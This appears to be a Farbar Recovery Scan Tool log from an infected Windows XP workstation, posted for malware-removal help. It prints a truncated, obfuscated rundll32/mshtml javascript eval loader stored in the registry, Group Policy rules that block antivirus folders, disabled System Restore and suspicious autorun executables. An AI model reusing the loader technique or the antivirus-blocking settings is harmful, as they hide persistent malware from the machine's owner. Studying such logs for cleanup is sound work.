S3 SBFWIMCL; C:\WINDOWS\System32\DRIVERS\sbfwim.sys [69208 2011-02-08] (Sunbelt Software, Inc.)
R3 SBFWIMCLMP; C:\WINDOWS\System32\DRIVERS\SBFWIM.sys [69208 2011-02-08] (Sunbelt Software, Inc.)
S3 sbhips; C:\WINDOWS\System32\drivers\sbhips.sys [94040 2011-04-05] (Sunbelt Software, Inc.)
R1 SbTis; C:\WINDOWS\System32\drivers\sbtis.sys [212568 2011-04-05] (Sunbelt Software, Inc.)
S3 silabenm; C:\WINDOWS\System32\DRIVERS\silabenm.sys [17920 2008-08-27] (Silicon Laboratories, Inc.)
S3 silabser; C:\WINDOWS\System32\DRIVERS\silabser.sys [60544 2008-08-27] (Silicon Laboratories)
R3 STHDA; C:\WINDOWS\System32\drivers\sthda.sys [1156648 2006-03-24] (SigmaTel, Inc.)
R1 Tcpip6; C:\WINDOWS\System32\DRIVERS\tcpip6.sys [226880 2010-02-11] (Microsoft Corporation)
S3 toshidpt; C:\WINDOWS\System32\drivers\Toshidpt.sys [3712 2005-07-11] (TOSHIBA Corporation.) [File not signed]
R3 tosporte; C:\WINDOWS\System32\DRIVERS\tosporte.sys [47104 2005-11-22] (TOSHIBA Corporation) [File not signed]
S3 Tosrfbd; C:\WINDOWS\System32\Drivers\tosrfbd.sys [108928 2006-01-20] (TOSHIBA CORPORATION) [File not signed]
S3 Tosrfbnp; C:\WINDOWS\System32\Drivers\tosrfbnp.sys [36480 2005-09-15] (TOSHIBA Corporation) [File not signed]
R1 Tosrfcom; C:\WINDOWS\System32\Drivers\tosrfcom.sys [64896 2005-08-01] (TOSHIBA Corporation) [File not signed]
S3 Tosrfhid; C:\WINDOWS\System32\DRIVERS\Tosrfhid.sys [62848 2006-01-11] (TOSHIBA Corporation.) [File not signed]
S3 tosrfnds; C:\WINDOWS\System32\DRIVERS\tosrfnds.sys [18612 2005-01-06] (TOSHIBA Corporation.) [File not signed]
S3 TosRfSnd; C:\WINDOWS\System32\drivers\TosRfSnd.sys [50048 2005-04-06] (TOSHIBA Corporation) [File not signed]
S3 Tosrfusb; C:\WINDOWS\System32\Drivers\tosrfusb.sys [39936 2006-02-09] (TOSHIBA CORPORATION) [File not signed]
R3 wanatw; C:\WINDOWS\System32\DRIVERS\wanatw4.sys [33588 2003-01-10] (America Online, Inc.)
S3 FilterService; system32\DRIVERS\lvuvcflt.sys [X]
S3 LVUVC; system32\DRIVERS\lvuvc.sys [X]
U5 ScsiPort; C:\WINDOWS\system32\drivers\scsiport.sys [96384 2008-04-14] (Microsoft Corporation)
S3 usb6xxxk; \??\C:\WINDOWS\system32\drivers\usb6xxxkl.sys [X]
Did a couple things to get the thing usable again and hopefully stop the bleeding.
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 11-03-2015
Ran by Aspen Compressor (administrator) on TEST on 03-04-2015 12:52:58
Running from C:\Documents and Settings\Aspen Compressor\Desktop
Loaded Profiles: Aspen Compressor (Available profiles: Aspen Compressor & Administrator & Guest)
Platform: Microsoft Windows XP Professional Service Pack 3 (X86) OS Language: English (United States)
Internet Explorer Version 8 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool:
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
() C:\WINDOWS\system32\WLTRYSVC.EXE
(Dell Inc.) C:\WINDOWS\system32\BCMWLTRY.EXE
(Avast Software s.r.o.) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Microsoft Corporation) C:\WINDOWS\system32\scardsvr.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(GEAR Software) C:\WINDOWS\system32\gearsec.exe
(Oracle Corporation) C:\Program Files\Java\jre7\bin\jqs.exe
(http://libusb-win32.sourceforge.net) C:\WINDOWS\system32\libusbd-nt.exe
(National Instruments Corporation) C:\WINDOWS\system32\lkads.exe
(National Instruments Corporation) C:\WINDOWS\system32\lktsrv.exe
(National Instruments Corporation) C:\Program Files\National Instruments\MAX\nimxs.exe
(Dell Inc.) C:\Program Files\Dell\QuickSet\NicConfigSvc.exe
(National Instruments Corporation) C:\WINDOWS\system32\nipalsm.exe
(National Instruments Corporation) C:\Program Files\National Instruments\Shared\Security\nidmsrv.exe
(National Instruments Corporation) C:\WINDOWS\system32\nisvcloc.exe
(National Instruments Corporation) C:\Program Files\National Instruments\Shared\Tagger\tagsrv.exe
() C:\Program Files\NTRU Cryptosystems\NTRU Hybrid TSS v2.0.25\bin\tcsd_win32.exe
(PowerQuest Corporation) C:\Program Files\PowerQuest\Drive Image 7.0\Agent\PQV2iSvc.exe
(National Instruments Corporation) C:\Program Files\National Instruments\Shared\mDNS Responder\nimdnsResponder.exe
(National Instruments Corporation) C:\WINDOWS\system32\nipxism.exe
(National Instruments Corporation) C:\Program Files\IVI Foundation\VISA\WinNT\NIvisa\niLxiDiscovery.exe
(Avast Software s.r.o.) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Microsoft Corporation) C:\WINDOWS\system32\wbem\unsecapp.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
==================== Registry (Whitelisted) ==================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\qttask.exe [421888 2011-10-24] (Apple Inc.)
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [5512912 2015-04-03] (Avast Software s.r.o.)
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Symantec <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Trend Micro <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Common Files\Symantec Shared <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\ESET <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Symantec <====== ATTENTION
HKLM\...99B7938DA9E4}\LocalServer32: [a] rundll32.exe javascript:"qqq5\..\mshtml,RunHTMLApplication ";eval(")odv!@buhwdYNckdbu)#VRbshqu/Ridmm (the data entry has 27834 more characters). <==== ATTENTION!
HKLM\...\Policies\Explorer: [NoCDBurning] 0
HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore: [DisableSR/DisableConfig] <===== ATTENTION
HKU\S-1-5-20\...\Run: [Adobe CSS5.1 Manager] => C:\Documents and Settings\NetworkService\Local Settings\Application Data\50e417e0-e461-474b-96e2-077b80325612ad\eeebebad.exe
HKU\S-1-5-20\...\RunOnce: [Adobe CSS5.1 Manager] => C:\Documents and Settings\NetworkService\Local Settings\Application Data\50e417e0-e461-474b-96e2-077b80325612ad\eeebebad.exe
HKU\S-1-5-21-2166601262-1343259015-1080389504-1009\...\Run: [547F5C72] => C:\Documents and Settings\Aspen Compressor\Application Data\547F5C72\bin.exe [145408 2015-04-03] (Karen Kenworthy)
HKU\S-1-5-18\...\Run: [swg] => C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2010-03-03] (Google Inc.)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll (Avast Software s.r.o.)
BootExecute: autocheck autochk * aswBoot.exe /M:108526275 /dir:"C:\Program Files\AVAST Software\Avast"
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-2166601262-1343259015-1080389504-1009\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com/hws/sb/dell-usuk-rel/en/side.html?channel=us
HKU\S-1-5-21-2166601262-1343259015-1080389504-1009\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/hws/sb/dell-usuk-rel/en/side.html?channel=us
HKU\S-1-5-21-2166601262-1343259015-1080389504-1009\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com/ig/dell?hl=en&client=dell-usuk-rel&channel=us&ibd=4070424
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll [2014-01-19] (Oracle Corporation)
BHO: Qualys BrowserCheck IE Helper -> {7D2FB79E-E58C-4DB5-A36F-AC1C73967FA5} -> C:\WINDOWS\Downloaded Program Files\qbc_bho.dll [2013-03-18] (Qualys, Inc.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2015-03-30] (Google Inc.)
BHO: Google Toolbar Notifier BHO -> {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} -> C:\Program Files\Google\GoogleToolbarNotifier\5.10.11023.1534\swg.dll [2015-03-30] (Google Inc.)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll [2014-01-19] (Oracle Corporation)
Toolbar: HKLM - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2013-05-08] (Adobe Systems Incorporated)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2015-03-30] (Google Inc.)
Toolbar: HKU\.DEFAULT -> Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2013-05-08] (Adobe Systems Incorporated)
Toolbar: HKU\.DEFAULT -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2015-03-30] (Google Inc.)
Toolbar: HKU\S-1-5-21-2166601262-1343259015-1080389504-1009 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2015-03-30] (Google Inc.)
DPF: {17492023-C23A-453E-A040-C7C580BBF700} http://download.microsoft.com/downl...-4117-8430-A67417AA88CD/LegitCheckControl.cab
DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} http://download.eset.com/special/eos/OnlineScanner.cab
DPF: {78AF2F24-A9C3-11D3-BF8C-0060B0FCC122} file:///C:/Program%20Files/AutoCAD%20LT%202002/AcDcToday.ocx
DPF: {7D2FB79E-E58C-4DB5-A36F-AC1C73967F4D} https://browsercheck.qualys.com/qbc_ax.cab
DPF: {AE563720-B4F5-11D4-A415-00108302FDFD} file:///C:/Program%20Files/AutoCAD%20LT%202002/InstBanr.ocx
DPF: {C6637286-300D-11D4-AE0A-0010830243BD} file:///C:/Program%20Files/AutoCAD%20LT%202002/InstFred.ocx
DPF: {CAFEEFAC-0016-0000-0030-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab
DPF: {F281A59C-7B65-11D3-8617-0010830243BD} file:///C:/Program%20Files/AutoCAD%20LT%202002/AcPreview.ocx
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - No File []
ShellExecuteHooks: Windows Desktop Search Namespace Manager - {56F9679E-7826-4C84-81F3-532071A8BCC5} - C:\Program Files\Windows Desktop Search\MSNLNamespaceMgr.dll [294400 2007-02-05] (Microsoft Corporation)
Winsock: Catalog5 04 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Winsock: Catalog5 06 C:\Program Files\National Instruments\Shared\mDNS Responder\nimdnsNSP.dll [24216] (National Instruments Corporation)
Tcpip\Parameters: [DhcpNameServer] 192.168.2.12
FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF32_16_0_0_305.dll [2015-02-11] ()
FF Plugin: @java.com/DTPlugin,version=10.51.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-01-19] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.51.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll [2014-01-19] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.20125.0\npctrl.dll [2013-01-24] ( Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-30] (Microsoft Corporation)
FF Plugin: @real.com/nppl3260;version=15.0.6.14 -> C:\Program Files\Real\RealPlayer\Netscape6\nppl3260.dll [2012-12-02] (RealNetworks, Inc.)
FF Plugin: @real.com/nprjplug;version=15.0.6.14 -> C:\Program Files\Real\RealPlayer\Netscape6\nprjplug.dll [2012-12-02] (RealNetworks, Inc.)
FF Plugin: @real.com/nprpchromebrowserrecordext;version=15.0.6.14 -> C:\Documents and Settings\All Users\Application Data\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprpchromebrowserrecordext.dll [2012-12-02] (RealNetworks, Inc.)
FF Plugin: @real.com/nprphtml5videoshim;version=15.0.6.14 -> C:\Documents and Settings\All Users\Application Data\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprphtml5videoshim.dll [2012-12-02] (RealNetworks, Inc.)
FF Plugin: @real.com/nprpplugin;version=15.0.6.14 -> C:\Program Files\Real\RealPlayer\Netscape6\nprpplugin.dll [2012-12-02] (RealPlayer)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-02-11] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-02-11] (Google Inc.)
FF Plugin: @viewpoint.com/VMP -> C:\Program Files\Viewpoint\Viewpoint Experience Technology\npViewpoint.dll [2004-02-20] ()
FF Plugin: Adobe Acrobat -> C:\Program Files\Adobe\Acrobat 9.0\Acrobat\Air\nppdf32.dll [2013-05-08] (Adobe Systems Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2013-05-11] (Adobe Systems Inc.)
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: No Name - C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2012-12-16]
FF HKLM\...\Firefox\Extensions: [{0153E448-190B-4987-BDE1-F256CADA672F}] - C:\Documents and Settings\All Users\Application Data\Real\RealPlayer\BrowserRecordPlugin\Firefox\Ext
FF Extension: RealPlayer Browser Record Plugin - C:\Documents and Settings\All Users\Application Data\Real\RealPlayer\BrowserRecordPlugin\Firefox\Ext [2012-12-02]
FF HKLM\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2015-04-03]
Chrome:
=======
CHR Profile: C:\Documents and Settings\Aspen Compressor\Local Settings\Application Data\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Documents and Settings\Aspen Compressor\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2014-09-16]
CHR Extension: (Google Docs) - C:\Documents and Settings\Aspen Compressor\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-09-16]
CHR Extension: (Google Drive) - C:\Documents and Settings\Aspen Compressor\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-09-16]
CHR Extension: (YouTube) - C:\Documents and Settings\Aspen Compressor\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-09-16]
CHR Extension: (Google Search) - C:\Documents and Settings\Aspen Compressor\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-09-16]
CHR Extension: (Google Sheets) - C:\Documents and Settings\Aspen Compressor\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2014-09-16]
CHR Extension: (RealPlayer HTML5Video Downloader Extension) - C:\Documents and Settings\Aspen Compressor\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\jfmjfhklogoienhpfnppmbcbjfjnkonk [2014-09-16]
CHR Extension: (Chrome Hotword Shared Module) - C:\Documents and Settings\Aspen Compressor\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-04-02]
CHR Extension: (Google Wallet) - C:\Documents and Settings\Aspen Compressor\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-09-16]
CHR Extension: (Gmail) - C:\Documents and Settings\Aspen Compressor\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-09-16]
CHR HKLM\...\Chrome\Extension: [jfmjfhklogoienhpfnppmbcbjfjnkonk] - C:\Documents and Settings\All Users\Application Data\Real\RealPlayer\BrowserRecordPlugin\Chrome\Ext\rphtml5video.crx [2012-12-02]
StartMenuInternet: chrome.exe - C:\Documents and Settings\dolsen\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
========================== Services (Whitelisted) =================
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
R2 6to4; C:\WINDOWS\System32\6to4svc.dll [100864 2010-02-12] (Microsoft Corporation)
S3 AOL ACS; C:\Program Files\Common Files\AOL\ACS\AOLAcsd.exe [46184 2014-02-06] (AOL Inc.)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [343336 2015-04-03] (Avast Software s.r.o.)
S4 Bluetooth Hid Switch Service; C:\Program Files\BlueTooth\HidSwitchService\HidSw.exe [188416 2005-08-30] (Cambridge Silicon Radio) [File not signed]
S3 FLEXnet Licensing Service; C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [651720 2010-03-31] (Macrovision Europe Ltd.) [File not signed]
R2 GEARSecurity; C:\WINDOWS\System32\GEARSec.exe [53248 2004-02-17] (GEAR Software) [File not signed]
R2 JavaQuickStarterService; C:\Program Files\Java\jre7\bin\jqs.exe [182696 2014-01-19] (Oracle Corporation)
R2 libusbd; C:\WINDOWS\System32\libusbd-nt.exe [18944 2005-03-09] (http://libusb-win32.sourceforge.net) [File not signed]
S3 LkCitadelServer; C:\WINDOWS\system32\lkcitdl.exe [695136 2008-10-31] (National Instruments, Inc.)
R2 lkClassAds; C:\WINDOWS\system32\lkads.exe [42544 2009-06-18] (National Instruments Corporation)
R2 lkTimeSync; C:\WINDOWS\system32\lktsrv.exe [53296 2009-06-18] (National Instruments Corporation)
S4 msvsmon80; C:\Program Files\Microsoft Visual Studio 8\Common7\IDE\Remote Debugger\x86\msvsmon.exe [2799808 2005-09-23] (Microsoft Corporation)
R2 mxssvr; C:\Program Files\National Instruments\MAX\nimxs.exe [12696 2009-10-20] (National Instruments Corporation)
R2 NICCONFIGSVC; C:\Program Files\Dell\QuickSet\NICCONFIGSVC.exe [376832 2006-06-29] (Dell Inc.) [File not signed]
R2 nidevldu; C:\WINDOWS\system32\nipalsm.exe [12696 2008-08-21] (National Instruments Corporation)
R2 NIDomainService; C:\Program Files\National Instruments\Shared\Security\nidmsrv.exe [356912 2009-06-18] (National Instruments Corporation)
S3 NILM License Manager; C:\Program Files\National Instruments\Shared\License Manager\Bin\lmgrd.exe [1007616 2009-09-18] (Macrovision Corporation) [File not signed]
R2 niLXIDiscovery; C:\Program Files\IVI Foundation\VISA\WinNT\NIvisa\niLxiDiscovery.exe [131704 2009-03-05] (National Instruments Corporation)
R2 nimDNSResponder; C:\Program Files\National Instruments\Shared\mDNS Responder\nimdnsResponder.exe [193648 2009-06-04] (National Instruments Corporation)
R2 nipxirmu; C:\WINDOWS\system32\nipxism.exe [14416 2010-02-18] (National Instruments Corporation)
R2 niSvcLoc; C:\WINDOWS\system32\nisvcloc.exe [13896 2009-06-04] (National Instruments Corporation)
R2 NITaggerService; C:\Program Files\National Instruments\Shared\Tagger\tagsrv.exe [607848 2008-06-20] (National Instruments Corporation)
S3 SolidWorks Licensing Service; C:\Program Files\Common Files\SolidWorks Shared\Service\SolidWorksLicensing.exe [79360 2010-09-23] (SolidWorks) [File not signed]
R2 tcsd_win32.exe; C:\Program Files\NTRU Cryptosystems\NTRU Hybrid TSS v2.0.25\bin\tcsd_win32.exe [180224 2006-06-12] () [File not signed]
R2 V2i Protector; C:\Program Files\PowerQuest\Drive Image 7.0\Agent\PQV2iSvc.exe [1253376 2004-02-17] (PowerQuest Corporation) [File not signed]
R2 wltrysvc; C:\WINDOWS\System32\bcmwltry.exe [2232320 2010-10-29] (Dell Inc.) [File not signed]
==================== Drivers (Whitelisted) ====================
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
S4 abp480n5; C:\WINDOWS\system32\DRIVERS\ABP480N5.SYS [23552 2001-08-17] (Microsoft Corporation)
R1 APPDRV; C:\WINDOWS\SYSTEM32\DRIVERS\APPDRV.SYS [16128 2005-08-12] (Dell Inc) [File not signed]
R2 aswHwid; C:\WINDOWS\system32\drivers\aswHwid.sys [24144 2015-04-03] ()
R2 aswMonFlt; C:\WINDOWS\system32\drivers\aswMonFlt.sys [73440 2015-04-03] (Avast Software s.r.o.)
R1 aswRdr; C:\WINDOWS\system32\drivers\aswRdr.sys [55200 2015-04-03] (Avast Software s.r.o.)
R0 aswRvrt; C:\WINDOWS\system32\Drivers\aswRvrt.sys [49904 2015-04-03] ()
R1 aswSnx; C:\WINDOWS\system32\drivers\aswSnx.sys [788272 2015-04-03] (Avast Software s.r.o.)
R1 aswSP; C:\WINDOWS\system32\drivers\aswSP.sys [427736 2015-04-03] (Avast Software s.r.o.)
R1 aswTdi; C:\WINDOWS\system32\drivers\aswTdi.sys [57888 2015-04-03] (Avast Software s.r.o.)
R0 aswVmm; C:\WINDOWS\system32\Drivers\aswVmm.sys [208024 2015-04-03] ()
R3 BCM43XX; C:\WINDOWS\System32\DRIVERS\bcmwl5.sys [2649216 2010-10-29] (Broadcom Corporation)
S3 BCOREUSB; C:\WINDOWS\System32\Drivers\BCOREUSB.sys [86867 2005-10-03] (CSR)
S3 CCDECODE; C:\WINDOWS\System32\DRIVERS\CCDECODE.sys [17024 2008-04-14] (Microsoft Corporation)
S3 CSRBC; C:\WINDOWS\System32\Drivers\csrbcxp.sys [31744 2007-01-16] (CSR, plc) [File not signed]
R2 cvintdrv; C:\WINDOWS\system32\Drivers\cvintdrv.sys [4096 2008-04-07] () [File not signed]
R2 DLABOIOM; C:\WINDOWS\System32\DLA\DLABOIOM.SYS [25628 2005-09-08] (Sonic Solutions) [File not signed]
R1 DLACDBHM; C:\WINDOWS\System32\Drivers\DLACDBHM.SYS [5628 2005-08-25] (Sonic Solutions) [File not signed]
R2 DLADResN; C:\WINDOWS\System32\DLA\DLADResN.SYS [2496 2005-09-08] (Sonic Solutions) [File not signed]
R2 DLAIFS_M; C:\WINDOWS\System32\DLA\DLAIFS_M.SYS [86524 2005-09-08] (Sonic Solutions) [File not signed]
R2 DLAOPIOM; C:\WINDOWS\System32\DLA\DLAOPIOM.SYS [14684 2005-09-08] (Sonic Solutions) [File not signed]
R2 DLAPoolM; C:\WINDOWS\System32\DLA\DLAPoolM.SYS [6364 2005-09-08] (Sonic Solutions) [File not signed]
R1 DLARTL_N; C:\WINDOWS\System32\Drivers\DLARTL_N.SYS [22684 2005-08-25] (Sonic Solutions) [File not signed]
R2 DLAUDFAM; C:\WINDOWS\System32\DLA\DLAUDFAM.SYS [94332 2005-09-08] (Sonic Solutions) [File not signed]
R2 DLAUDF_M; C:\WINDOWS\System32\DLA\DLAUDF_M.SYS [87036 2005-09-08] (Sonic Solutions) [File not signed]
R0 DRVMCDB; C:\WINDOWS\System32\Drivers\DRVMCDB.SYS [89264 2005-09-12] (Sonic Solutions) [File not signed]
R2 DRVNDDM; C:\WINDOWS\System32\Drivers\DRVNDDM.SYS [40544 2005-08-12] (Sonic Solutions) [File not signed]
S3 DSproct; C:\Program Files\Dell Support\GTAction\triggers\DSproct.sys [4864 2006-01-10] (GTek Technologies Ltd.) [File not signed]
R3 guardian2; C:\WINDOWS\System32\Drivers\oz776.sys [61312 2007-01-28] (O2Micro)
R3 libusb0; C:\WINDOWS\System32\drivers\libusb0.sys [33792 2005-03-09] () [File not signed]
S3 lvalarmk; C:\WINDOWS\system32\drivers\lvalarmk.sys [20104 2008-12-05] (National Instruments Corporation)
S2 MCUSBICD2; C:\WINDOWS\System32\Drivers\icd2w2k.sys [12427 2004-03-22] (Microchip Technology, Inc.) [File not signed]
S2 MCUSBPM3; C:\WINDOWS\System32\Drivers\PM3w2k.sys [12447 2004-03-22] (Microchip Technology, Inc.) [File not signed]
S3 NCBULK; C:\WINDOWS\System32\drivers\RealICEBulk.sys [12160 2007-04-05] (PLX Technology, Inc. (visit www.PlxTech.com)) [File not signed]
S3 NdisIP; C:\WINDOWS\System32\DRIVERS\NdisIP.sys [10880 2008-04-14] (Microsoft Corporation)
S3 ni1006k; C:\WINDOWS\system32\drivers\ni1006k.sys [26192 2009-10-20] (National Instruments Corporation)
S3 ni1045k; C:\WINDOWS\system32\drivers\ni1045kl.sys [11344 2009-10-20] (National Instruments Corporation)
S3 ni1065k; C:\WINDOWS\system32\drivers\ni1065k.sys [22608 2009-10-20] (National Instruments Corporation)
S3 nicdrk; C:\WINDOWS\system32\drivers\nicdrkl.sys [11352 2009-07-17] (National Instruments Corporation)
S3 nicmrk; C:\WINDOWS\system32\drivers\nicmrkl.sys [11368 2010-02-11] (National Instruments Corporation)
S3 nicsrk; C:\WINDOWS\system32\drivers\nicsrkl.sys [11336 2010-02-11] (National Instruments Corporation)
S3 nicsrkw; C:\WINDOWS\System32\DRIVERS\nicsrkw.sys [10824 2010-02-11] (National Instruments Corporation)
R3 nidimk; C:\WINDOWS\system32\drivers\nidimkl.sys [11360 2009-07-07] (National Instruments Corporation)
S3 nidmxfk; C:\WINDOWS\system32\drivers\nidmxfkl.sys [11336 2010-02-01] (National Instruments Corporation)
S3 nidsark; C:\WINDOWS\system32\drivers\nidsarkl.sys [11344 2010-02-06] (National Instruments Corporation)
S3 niemrk; C:\WINDOWS\system32\drivers\niemrkl.sys [11336 2010-02-11] (National Instruments Corporation)
S3 niesrk; C:\WINDOWS\system32\drivers\niesrkl.sys [11336 2010-02-06] (National Instruments Corporation)
S3 nifslk; C:\WINDOWS\system32\drivers\nifslkl.sys [11352 2010-02-02] (National Instruments Corporation)
R3 nimdbgk; C:\WINDOWS\system32\drivers\nimdbgkl.sys [11360 2009-11-13] (National Instruments Corporation)
R3 nimru2k; C:\WINDOWS\system32\drivers\nimru2kl.sys [11360 2009-08-24] (National Instruments Corporation)
S3 nimsdrk; C:\WINDOWS\system32\drivers\nimsdrkl.sys [11904 2010-02-02] (National Instruments Corporation)
S3 nimslk; C:\WINDOWS\system32\drivers\nimslk.dll [14464 2009-07-23] (National Instruments Corporation) [File not signed]
S3 nimsrlk; C:\WINDOWS\system32\drivers\nimsrlk.dll [151683 2009-07-23] (National Instruments Corporation) [File not signed]
R3 nimstsk; C:\WINDOWS\system32\drivers\nimstskl.sys [11872 2010-02-01] (National Instruments Corporation)
R3 nimxdfk; C:\WINDOWS\system32\drivers\nimxdfkl.sys [11344 2009-07-07] (National Instruments Corporation)
S3 nimxpk; C:\WINDOWS\system32\drivers\nimxpkl.sys [11880 2010-02-01] (National Instruments Corporation)
S3 ninshsdk; C:\WINDOWS\system32\drivers\ninshsdkl.sys [11360 2010-02-05] (National Instruments Corporation)
S3 niorbk; C:\WINDOWS\system32\drivers\niorbkl.sys [11344 2009-06-14] (National Instruments Corporation)
S3 nipalfwedl; C:\WINDOWS\System32\drivers\nipalfwedl.sys [11904 2010-01-10] (National Instruments Corporation)
R0 NIPALK; C:\WINDOWS\System32\drivers\nipalk.sys [597592 2010-01-10] (National Instruments Corporation)
S3 nipalusbedl; C:\WINDOWS\System32\drivers\nipalusbedl.sys [11896 2010-01-10] (National Instruments Corporation)
R0 nipbcfk; C:\WINDOWS\System32\drivers\nipbcfk.sys [15448 2009-07-07] (National Instruments Corporation)
S3 nipxigpk; C:\WINDOWS\system32\drivers\nipxigpk.sys [20568 2008-06-25] (National Instruments Corporation)
